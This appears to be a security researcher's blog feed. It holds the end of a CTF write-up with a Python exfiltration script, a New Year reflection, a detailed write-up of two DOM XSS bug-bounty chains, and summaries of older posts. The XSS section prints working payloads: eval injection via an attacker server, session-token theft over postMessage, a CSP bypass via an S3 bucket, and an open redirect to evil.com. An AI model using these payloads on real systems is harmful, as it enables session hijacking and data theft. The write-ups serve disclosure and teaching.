def get_file_name(index):
    send_command("powershell \"Add-Content {} $(ls)[{}].Name -NoNewLine\"".format(WORKING_FILE, index))
    send_command("powershell \"(Get-Content {}).replace('_', '-') | Set-Content {} -NoNewLine\"".format(WORKING_FILE, WORKING_FILE))
    exfil_working_file()
    

def exfil_final_uwu():
    delete_file("c")
    delete_file("x")
    delete_file("y")
    send_command("cmd /c \"echo ^4 > c\"")
    send_command("cmd /c \"echo ^5 >> c\"")
    send_command("cmd /c \"type c | cmd /c final_uwu_with_flag.exe > x\"")
    sleep(3)        # more time to play UwU sound
    send_command("powershell \"Select-String -Path x -Pattern TISC|Out-File y\"")       # save more time
    exfil_file("y")

if __name__ == "__main__":
    delete_file(WORKING_FILE)
    # get_user()
    # get_pwd()
    # get_file_name(2)
    # exfil_file('1_run_uwu1.bat')
    # exfil_lost_block('e', 120, 30)
    # exfil_lost_block('e', 330, 13)
    # exfil_lost_block('y', 25, 25)
    exfil_final_uwu()   

Interestingly, this turned out to be an unintended solution as I was meant to rely purely on the shellcode to transmit the flag via the UwU.exe messaging functions. I had considered this route earlier but decided that it would be too troublesome to set up the call stack. Fortunately, life found a way.

TISC{UwU_m@lwArez_4_uWuuUU!}

Conclusion

After two weeks of intense puzzle solving, I finished all 10 levels, claiming $25,000 for charity as one other participant had completed level 8. CSIT kindly donated the prize money to The Community Chest on my behalf. I got lots of practice exploiting a broad range of targets and crafted my own ASCII-only Windows WinExec shellcode that could be reused for future exploits. It was a trial by fire that gave me more confidence to tackle new CTF domains such as steganography, forensics, and pwn. Many of the later challenges featured twists that forced me to “try harder” beyond existing writeups and conduct my own original research. If I could award prizes to challenges, they would be:

  1. Most Hardcore: Malware for UwU
  2. Best Storyline: 1865 Text Adventure
  3. Biggest Headache: Get-Shwifty
  4. Most Dynamic: The Secret
  5. Biggest Haystack: Knock Knock, Who’s There
  6. Smallest Needle: Need for Speed
  7. Smallest Payload: The Magician's Den
  8. Most Likely to Make Me Guess: Needle in a Greystack
  9. Most Enraging: Dee Na Saw as a need
  10. Most Parts: Scratching the Surface

Thank you TISC organising team for a great challenge!

Results

2Q21: New Year's Reflections

31 December 2021 at 10:24

This may be the most important proposition revealed by history: “At the time, no one knew what was coming.”

– Haruki Murakami, 1Q84

1Q84 sat on my shelf gathering dust for years after I bought it during a wildly-ambitious Amazon shopping spree. I promised myself that I would get round to reading it, but college offered far more immediate distractions.

I only started reading it in 2020, when a new phase of life – my first job! – triggered a burst of enthusiasm for fresh beginnings. I moved at a brisk pace, savouring Murakami’s knack for magical prose and weird similes (“His voice was hard and dry, reminding her of a desert plant that could survive a whole year on one day’s worth of rain.”). However, as a mysterious new virus crept, then leapt across the globe, I found myself slowing down. The fantastical plot filled with Little People and Air Chrysalises and two moons began to take on a degree of verisimilitude that pulled me out of the story.

Two-thirds into the book, one of the characters, a woman/fitness instructor/assassin named Aomame, isolates herself in a small apartment for months due to reasons outside of her control. Unable to even take a single step outside, she kills time by reading Proust (In Search of Lost Time), listening to the radio, and working out. She’s lost, trying to find her way back to a sense of normalcy. It felt too real; although I only had about a hundred pages left, I put the book back on the shelf.

The most-read New York Times story in 2021 labelled the pervasive sense of ennui as “languishing” – the indeterminable void between depression and flourishing. To combat this, it suggested rediscovering one’s “flow”.

I set three big learning goals for myself this year: artificial intelligence, vulnerability research, and Internet of Things.

I was lucky enough to snag an OpenAI GPT-3 beta invitation, and the tinkering that ensued eventually resulted in AI-powered phishing research that I presented with my colleagues at DEF CON and Black Hat USA. WIRED magazine covered the project in thankfully fairly nuanced terms.

In the meantime, I cut my teeth on basic exploitation with Offensive Security’s Exploit Developer course, which I then applied to my research to discover fresh Apache OpenOffice and Microsoft Office code execution bugs (The Register reported on my related HacktivityCon talk). Dipping my toes into vulnerability research reminded me just how vast this ocean is; it’ll be a long time before I can even tread water.

Finally, I trained with my colleagues in beginner IoT/OT concepts, winning the DEF CON ICS CTF. One thing I noticed about this space is the lack of good online trainings (even the in-person ones are iffy); there’s a niche market opportunity here. My vulnerability research team discovered 8 new vulnerabilities in Synology’s Network Attached Storage devices in a (failed) bid for Pwn2Own glory. Still, I made some lemonade with an upcoming talk at ShmooCon on why no one pwned Synology at Pwn2Own and TianFu Cup. Spoiler: it’s not because Synology is unhackable.

I finished 1Q84 last week. At the end of the book, Aomame escapes the dangerous alternate dimension she’s trapped in by entering yet another dimension – sadly, there’s no way home, as Spider-Man will tell you. I suspect that “same same but different” feeling will carry over to 2022 – even as we emerge from the great crisis, there will be no homecoming. We will have to deal with the strange new world we have stumbled into.

Whichever dimension we may be in, here’s wishing you and your loved ones a very happy new year.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controlled domain.
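
To make the missing origin check concrete, here is a minimal sketch that models the handler as a pure function, next to a variant with an origin allowlist. The names handleChatSettings, handleChatSettingsChecked, and ALLOWED_ORIGINS are hypothetical, and the allowlisted origin is only my assumption about which parent the iFrame was meant to trust.

```javascript
// Mirrors the vulnerable branch: any sender can overwrite settingsSync.
function handleChatSettings(state, e) {
  if (e.data.type === "ChatSettings" && e.data.iframeChatSettings) {
    state.settingsSync = e.data.iframeChatSettings;
  }
  return state;
}

// Hypothetical hardened variant: ignore messages from unexpected origins.
// Browsers serialise origins with a lowercase host, hence "companya".
const ALLOWED_ORIGINS = new Set(["https://feedback.companya.com"]);

function handleChatSettingsChecked(state, e) {
  if (!ALLOWED_ORIGINS.has(e.origin)) {
    return state; // untrusted sender, leave state untouched
  }
  return handleChatSettings(state, e);
}

// A message as an attacker-controlled page could send it.
const attackerEvent = {
  origin: "https://attacker.example",
  data: {
    type: "ChatSettings",
    iframeChatSettings: { environment: "production", region: "x_y" },
  },
};

const vulnerableState = handleChatSettings({ settingsSync: null }, attackerEvent);
const hardenedState = handleChatSettingsChecked({ settingsSync: null }, attackerEvent);

console.log(vulnerableState.settingsSync); // attacker-supplied settings were stored
console.log(hardenedState.settingsSync);   // still null, message was ignored
```

The only difference between the two functions is the comparison against e.origin, which is exactly what the original handler left out.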

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production", window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com'. This URL would then be used in a POST request. The response would be parsed as JSON and assigned to window.settingsSync. Next, window.settingsSync.versionNumber was used to construct the URL of a new JavaScript file to load: var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Everything after the ? (the .settingsSync.com suffix and the appended /public/ext_data path) became a harmless query string. Now domain pointed to bad-.my.website, a valid attacker-controlled domain that served a malicious payload in response to the POST request.
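
The rearrangement is easier to follow when run step by step. The sketch below copies the concatenation from third-party.js into a hypothetical helper, buildExtDataUrl, and lets the standard URL parser show where each request would go. The benign region value en_uk is my assumption about what a legitimate value looks like.

```javascript
// Reproduces the concatenation from third-party.js for a given region value.
function buildExtDataUrl(region) {
  const parts = region.split("_");
  const subdomain = parts[1] + "-" + parts[0];
  const domain = "https://" + subdomain + ".settingsSync.com";
  return domain + "/public/ext_data";
}

const benign = buildExtDataUrl("en_uk"); // assumed legitimate value
const malicious = buildExtDataUrl(".my.website/malicious.php?_bad");

console.log(benign);
console.log(malicious);

// Parsing the results shows which host actually receives the POST request.
const parsed = new URL(malicious);
console.log(new URL(benign).hostname); // the vendor's domain
console.log(parsed.hostname);          // the attacker's domain
console.log(parsed.pathname);          // the attacker's script
console.log(parsed.search);            // the leftover suffix, now a query string
```

The split on _ lets the attacker place arbitrary text before the fixed suffix, and the ? demotes that suffix to a query string.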

Diagram 1

I created malicious.php on my server to send a valid response, modelled on responses captured from the original target. I changed the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": "a;alert()//",
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//")
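
To see why this string runs the injected call, the following sketch builds the sink string the same way module-v2.js does and executes it against stand-ins for window and alert. It uses the Function constructor rather than eval so the stand-ins can be passed in as parameters. This is a simplification of my own, and buildSinkSource and runInSandbox are hypothetical names.

```javascript
// Builds the string that the sink passes to eval, as in module-v2.js.
function buildSinkSource(config) {
  return "window.settingsSync.configs." + config;
}

// Runs the string with a fake window and a fake alert that records calls,
// so the effect can be observed outside a browser.
function runInSandbox(source, settingsSync) {
  const calls = [];
  const fakeWindow = { settingsSync: settingsSync };
  const fakeAlert = (...args) => calls.push(args);
  new Function("window", "alert", source)(fakeWindow, fakeAlert);
  return calls.length;
}

const settings = { configs: { a: "a" } };

// A normal config name is just a property lookup.
const benignCalls = runInSandbox(buildSinkSource("a"), settings);

// The payload ends the lookup with ";", adds a call, and comments out the rest.
const attackCalls = runInSandbox(buildSinkSource("a;alert()//"), settings);

console.log(benignCalls, attackCalls);
```

The trailing // is not needed for this particular string, but it keeps the payload valid if the sink appends anything after config.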

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!
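
A rough sketch of such an attacker page follows. The message shape is inferred from the two handlers shown earlier (type, iframeChatSettings, environment, region). The real handler may have expected additional fields that are elided above, so treat buildChatSettingsMessage and launch as hypothetical helpers, not the exact proof of concept.

```javascript
// Builds the message the vulnerable iFrame handler appears to expect.
function buildChatSettingsMessage(region) {
  return {
    type: "ChatSettings",
    iframeChatSettings: { environment: "production", region: region },
  };
}

// Browser-only: opens the target page and posts the message to its second
// frame. The delay is a guess; the frame must finish loading first, and
// popup blockers usually require this to run from a click handler.
function launch(delayMs) {
  const child = window.open("https://feedback.companyA.com/");
  const message = buildChatSettingsMessage(".my.website/malicious.php?_bad");
  setTimeout(() => child.frames[1].postMessage(message, "*"), delayMs);
}

// Outside a browser, only the message itself can be inspected.
const exampleMessage = buildChatSettingsMessage(".my.website/malicious.php?_bad");
console.log(JSON.stringify(exampleMessage));
```

The wildcard target origin "*" is acceptable here because the attacker does not care who reads the message; it only matters that the vulnerable frame receives it.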

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.
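
The reason the chain works is that the parent's origin check is correct but trusts a compromised origin. A minimal sketch, with the parent handler rewritten as a hypothetical pure function parentHandler that returns the reply it would post back:

```javascript
// Pure-function model of the parent page's handler: returns the reply it
// would post to the iFrame, or null when the message is ignored.
function parentHandler(m, credentialConfig) {
  if (m.origin === "https://abc.cloudfront.net" && m.data.type === "IframeLoaded") {
    return { type: "credentialConfig", credentialConfig: credentialConfig };
  }
  return null;
}

const credentialConfig = { sessionToken: "Bearer <SESSIONTOKEN>" };

// Sent directly from an attacker page: the origin check rejects it.
const direct = parentHandler(
  { origin: "https://attacker.example", data: { type: "IframeLoaded" } },
  credentialConfig
);

// Sent by script running inside the compromised iFrame: the check passes.
const viaIframe = parentHandler(
  { origin: "https://abc.cloudfront.net", data: { type: "IframeLoaded" } },
  credentialConfig
);

console.log(direct);
console.log(viaIframe.credentialConfig.sessionToken);
```

An origin check only proves where a message came from, not that the code running at that origin is still the code the developer shipped.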

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a"
    }
}

The XSS received the session data from the parent window at https://feedback.companyA.com/ and could then exfiltrate the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to log in to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

Dynamic HTTP requests are governed by the connect-src CSP directive. Since this policy did not define connect-src, the default-src directive applied as the fallback, which meant that only requests to the page's own origin, *.companyb.com, and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.
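
The fallback behaviour can be sketched with a small policy parser. This is a deliberately simplified model rather than a full CSP implementation: hostAllowed only understands exact hosts and *.domain wildcards, and the function names are my own.

```javascript
// Parses a CSP header value into a map of directive name -> source list.
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0) {
      directives.set(tokens[0].toLowerCase(), tokens.slice(1));
    }
  }
  return directives;
}

// Fetch directives such as connect-src fall back to default-src when absent.
function effectiveSources(directives, name) {
  return directives.get(name) || directives.get("default-src") || [];
}

// Simplified host matching: exact hosts and "*.example.com" wildcards only.
function hostAllowed(sources, host) {
  return sources.some((source) => {
    if (source.startsWith("*.")) {
      return host.endsWith(source.slice(1));
    }
    return source === host;
  });
}

const policy =
  "default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; " +
  "script-src 'self' https: *.companyb.com; object-src 'none';";

const connectSources = effectiveSources(parseCsp(policy), "connect-src");
const bucketAllowed = hostAllowed(connectSources, "myevilbucket.s3.amazonaws.com");
const evilAllowed = hostAllowed(connectSources, "evil.com");

console.log(connectSources);
console.log(bucketAllowed, evilAllowed);
```

Because the wildcard matches any depth of subdomain, every S3 bucket name under s3.amazonaws.com falls inside the allowed set.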

I quickly hosted a JSON file with the text set to <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/payload.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2fpayload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP's script-src directive only allowed scripts from self or *.companyb.com over HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint redirected to the value of the url parameter after validating that it ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

Using this bypass as an open redirect, I saved my final XSS payload in a file named <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with its src pointing to the open redirect, which passed the CSP but ultimately redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

From checkra1n to Frida: iOS App Pentesting Quickstart on iOS 13

15 December 2019 at 15:41
I wanted to get into mobile app pentesting. While it’s relatively easy to get started on Android, it’s harder to do so with iOS. For example, while Android has Android Virtual Device and a host of other third-party emulators, iOS only has Xcode’s iOS Simulator, which mimics the software environment of an iPhone and not the hardware. As such, iOS app pentesting requires an actual iOS device.

Low-Hanging Apples: Hunting Credentials and Secrets in iOS Apps

29 December 2019 at 14:58
Diving straight into reverse-engineering iOS apps can be daunting and time-consuming. While wading into the binary can pay off greatly in the long run, it’s also useful to start off with the easy wins, especially when you have limited time and resources. One such easy win is hunting login credentials and API keys in iOS applications.

Remote Code Execution in Three Acts: Chaining Exposed Actuators and H2 Database Aliases in Spring Boot 2

12 January 2020 at 23:15
The Spring Boot framework is one of the most popular Java-based microservice frameworks that helps developers quickly and easily deploy Java applications. With its focus on developer-friendly tools and configurations, Spring Boot accelerates the development process. However, these development defaults can become dangerous in the hands of inexperienced developers.

A Tale of Two Formats: Exploiting Insecure XML and ZIP File Parsers to Create a Web Shell

18 February 2020 at 06:02
While researching a bug bounty target, I came across a web application that processed a custom file type which was actually just a ZIP file that contains an XML that functions as a manifest. If handled naively, this packaging pattern creates additional security issues. These “vulnerabilities” are actually features built into the XML and ZIP formats. Responsibility falls onto XML and ZIP parsers to handle these features safely. Unfortunately, this rarely happens, especially when developers simply use the default settings.

Same Same But Different: Discovering SQL Injections Incrementally with Isomorphic SQL Statements

5 April 2020 at 09:04
Despite the increased adoption of Object-Relational Mapping (ORM) libraries and prepared SQL statements, SQL injections continue to turn up in modern applications. In real-world scenarios, researchers need to balance two concerns when searching for SQL injections - 1. Ability to execute injections in multiple contexts; and 2. Ability to bypass WAFs and sanitization steps. A researcher can resolve this efficiently with something I call Isomorphic SQL Statements.

Closing the Loop: Practical Attacks and Defences for GraphQL APIs

15 May 2020 at 13:37
While GraphQL promised greater flexibility and power over traditional REST APIs, GraphQL could potentially increase the attack surface for access control vulnerabilities. Developers should look out for these issues when implementing GraphQL APIs and rely on secure defaults in production. At the same time, security researchers should pay attention to these weak spots when testing GraphQL APIs for vulnerabilities.

Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)

3 December 2020 at 13:04
I recently participated in FireEye’s seventh annual Flare-On Challenge, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best.

Supply Chain Pollution: Hunting a 16 Million Download/Week npm Package Vulnerability for a CTF Challenge

23 December 2020 at 15:29
GovTech’s Cyber Security Group recently organised the STACK the Flags Cybersecurity Capture-the-Flag (CTF) competition from 4th to 6th December 2020. For the web domain, my team wanted to build challenges that addressed real-world issues we have encountered during penetration testing of government web applications and commercial off-the-shelf products.

Applying Offensive Reverse Engineering to Facebook Gameroom

2 February 2021 at 17:03
Late last year, I was invited to Facebook’s Bountycon event, which is an invitation-only application security conference with a live-hacking segment. Although participants could submit vulnerabilities for any Facebook asset, Facebook invited us to focus on Facebook Gaming. Having previously tested Facebook’s assets, I knew it was going to be a tough challenge.

ROP and Roll: EXP-301 Offensive Security Exploit Developer (OSED) Review and Exam

23 June 2021 at 15:21
After clearing the OSEP at the end of February 2021, I took the 60-day EXP-301/OSED package from March to May 2021, and finally cleared the exam in mid-June. At the time of writing, this costs $1299. As my job role is pretty multi-disciplinary, I found it necessary to build up my exploit development skills and the OSED came at the right time.

Down the Rabbit Hole: Unusual Applications of OpenAI in Cybersecurity Tooling

17 September 2021 at 13:16
Most research into the malicious applications of AI tends to focus on human factors (scamming, phishing, disinformation). There has been some discussion of AI-powered malware but this remains very much in the proof-of-concept stage. This is partly a function of the kinds of models available to researchers - generative models lend themselves easily to synthetic media, while language models are easily applied to phishing and fake news. But where do we go from these low-hanging fruits?

All Your (d)Base Are Belong To Us, Part 1: Code Execution in Apache OpenOffice (CVE-2021-33035)

29 September 2021 at 03:35
This two-part series will share how I got started in vulnerability research by discovering and exploiting code execution zero-days in office applications used by hundreds of millions of people. I will outline my approach to getting started in vulnerability research including dumb fuzzing, coverage-guided fuzzing, reverse engineering, and source code review. I will also discuss some management aspects of vulnerability research such as CVE assignment and responsible disclosure.

All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021-38646)

22 October 2021 at 11:43
By searching for DBF-related vulnerabilities in Microsoft’s desktop database engines, I took one step towards the deep end of the fuzzing pool. I could no longer rely on source code review and dumb fuzzing; this time, I applied black-box coverage-based fuzzing with a dash of reverse engineering. My colleague Hui Yi has written several fantastic articles on fuzzing with WinAFL and DynamoRIO; I hope this article provides a practical application of those techniques to real vulnerabilities.